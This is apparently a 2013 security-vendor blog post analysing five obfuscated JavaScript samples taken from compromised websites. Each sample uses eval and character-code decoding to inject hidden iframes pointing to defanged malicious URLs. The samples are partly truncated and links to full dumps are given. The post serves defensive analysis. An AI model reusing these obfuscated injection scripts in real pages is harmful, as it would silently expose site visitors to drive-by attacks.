Monday, July 29, 2013

5 killer JavaScript threats blacklisting your website

5 samples of JavaScript threats detected on publicly available websites

Blacklisting check for website
Blacklisting check by Quttera website malware scanner

We have been collecting obfuscated JavaScript threats during last week. This post covers some interesting malicious scripts discovered in websites scanned by our public free website malware scanner. The websites were either already blacklisted by Google and/or other website integrity listings or have been blacklisted later.

Overview of the JavaScript threats injected into web pages


All of the presented threats were used to transparently inject malicious hidden iframes into legitimate web content and compromise visitors without any required user action.
Code obfuscation is an action which converts original source code or script into hardly understandable code. Obfuscated code or script is a code that passed through obfuscation and actually hides its initial purpose.

Usually, code/script obfuscation is done using publicly available automatic tools and doesn't require any prior knowledge or computer science degree to run it. Initially code obfuscation was used to protect intellectual property of developers but now it is widely used to obfuscate malicious scripts in order to overcome pattern based detection mechanisms that commonly installed on visitors' browsers.

All analyzed obfuscated web threats were found on home page of the infected sites. The script was executed during load of scanned website's home page. This means that content of pages referenced by hidden iframes were loaded by web browser before visitor even saw any content of the targeted website itself.


Sample 1


Malicious action: inject hidden iframe to http://rock-reform[.]info/js/esd.php

  1. ps = "split";
  2. = eval;
  3. = "0x";
  4. = 0;
  5. = "y";
  6. try {
  7.     a *= 25
  8. } catch (zz) {
  9.     a = 1
  10. }
  11. if (!a) {
  12.     try {
  13.         --e("doc" + "ument")["\x62od" + z]
  14.     } catch (q) {
  15.         a2 = "_";
  16.         sa = 0xa - 02;
  17.     }
  18.     z = "28_6e_7d_76_6b_7c_71_77_76_28_82_82_ ... 6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12" [ps](a2);
  19.     za = "";
  20.     for (= 0; i < z.length; i++) {
  21.         za += String["fromCharCode"](e(+ (z[i])) - sa);
  22.     }
  23.     zaz = za;
  24.     e(zaz);
  25. }




Full threat dump:  http://pastebin.com/fMEKEuTY




Sample 2


Malicious action: inject hidden iframe to http://cerfust[.]nl/paprika/clik[.]php
 


  1. try {
  2.     window.document.body++
  3. } catch (gdsgsdg) {
  4.     dbshre = 147;
  5. }
  6. if (dbshre) {
  7.     asd = 0;
  8.     try {
  9.         d = document.createElement("div");
  10.         d.innerHTML.a = "asd";
  11.     } catch (agdsg) {
  12.         asd = 1;
  13.     }
  14.     if (!asd) {
  15.         e = eval;
  16.     }
  17.     ss = String;
  18.     asgq = new Array(31, 94, 110, 104, 94, 107, 97, 104, 104, 27, 31, 33, 25,..., 34, 53);
  19.     s = "";
  20.     for (= 0; i - 484 != 0; i++) {
  21.     if ((020 == 0x10) % 26 % 26window.document) s += ss["fromCharCode"](1 * asgq[i] - (% 5 - 5 - 4));
  22.     }
  23.     z = s;
  24.     e(s);
  25. }


Full threat dump:  http://pastebin.com/75Bu9XNb



 

Sample 3


Malicious action: inject hidden iframe to http://cafelum[.]ru/tmp/46nqizls.php
 



  1. = "doc" + "ument";
  2. try {
  3.     ++document.body
  4. } catch (q) {
  5.     aa = function (ff) {
  6.         for (= 0; i < z.length; i++) {
  7.             za += String[ff](e(+ (z[i])) - 12);
  8.         }
  9.     };
  10. };
  11. ps = "split";
  12. = (eval);
  13. = "0x";
  14. = 0;
  15. = "y";
  16. try {;
  17. } catch (zz) {
  18.     a = 1
  19. }
  20. if (!a) {
  21.     try {
  22.         ++e(d)["bod" + z]
  23.     } catch (q) {
  24.         a2 = "_";
  25.     }
  26.     z = "2c_72_81_7a_6f_80_75_7b_ ... 34_35_47_19_16_89_19_16_89_19_16" [ps](a2);
  27.     za = "";
  28.     aa("fromCharCode");
  29.     zaz = za;
  30.     e(zaz);
  31. }
 

Full threat dump: http://pastebin.com/Ygu28hTp



Sample 4


Malicious action: inject hidden iframe to http://oc-sports[.]com/email/clik.php



  1. ps = "split";
  2. = eval;
  3. = "0x";
  4. = 0;
  5. = "y";
  6. try {
  7.     a *= 25
  8. } catch (zz) {
  9.     a = 1
  10. }
  11. if (!a) {
  12.     try {
  13.         --e("doc" + "ument")["\x62od" + z]
  14.     } catch (q) {
  15.         a2 = "_";
  16.         sa = 0xa - 02;
  17.     }
  18.     z = "28_6e_7d_76_6b_7c..._15_12_85_15_12_85_15_12" [ps](a2);
  19.     za = "";
  20.     for (= 0; i < z.length; i++) {
  21.         za += String["fromCharCode"](e(+ (z[i])) - sa);
  22.     }
  23.     zaz = za;
  24.     e(zaz);
  25. }


Full threat dump: http://pastebin.com/kECUdVDE


 

Sample 5


Malicious action:  generates and injects hidden iframes to random websites in *.ru area



  1. try {
  2.     prototype % 2;
  3. } catch (asd) {
  4.     x = 2;
  5. }
  6. try {
  7.     q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? "e" + "n" + "t" :"")]("p");
  8.     q.appendChild(+ "");
  9. } catch (fwbewe) {
  10.     i = 0;
  11.     try {
  12.         prototype * 5;
  13.     } catch (z) {
  14.         fr = "fromChar";
  15.         f = [510, 702, 550, 594, 580, 630, 555, 660, ... 264, 160, 318, 240, 288, 205, 354];
  16.         v = "eva";
  17.     }
  18.     if (v) e = window[+ "l"];
  19.     w = f;
  20.     s = [];
  21.     r = String;
  22.     z = ((e) ? "Code" : "");
  23.     for (; 1776 - 5 + 5 > i; i += 1) {
  24.         j = i;
  25.         if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
  26.     }
  27.     if (f) e(s);
  28. }

Full threat dump: http://pastebin.com/3LJDBMCL

Summary

As stated earlier these threats were the reason for websites to get blacklisted. From their history they were not intentionally malicious but have been compromised to serve the hackers. Scanning your website can save you headache of getting out from blacklist and avoid traffic loss on the early stages of the attack.

Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for real-time anti-malware monitoring and for remediation assessment.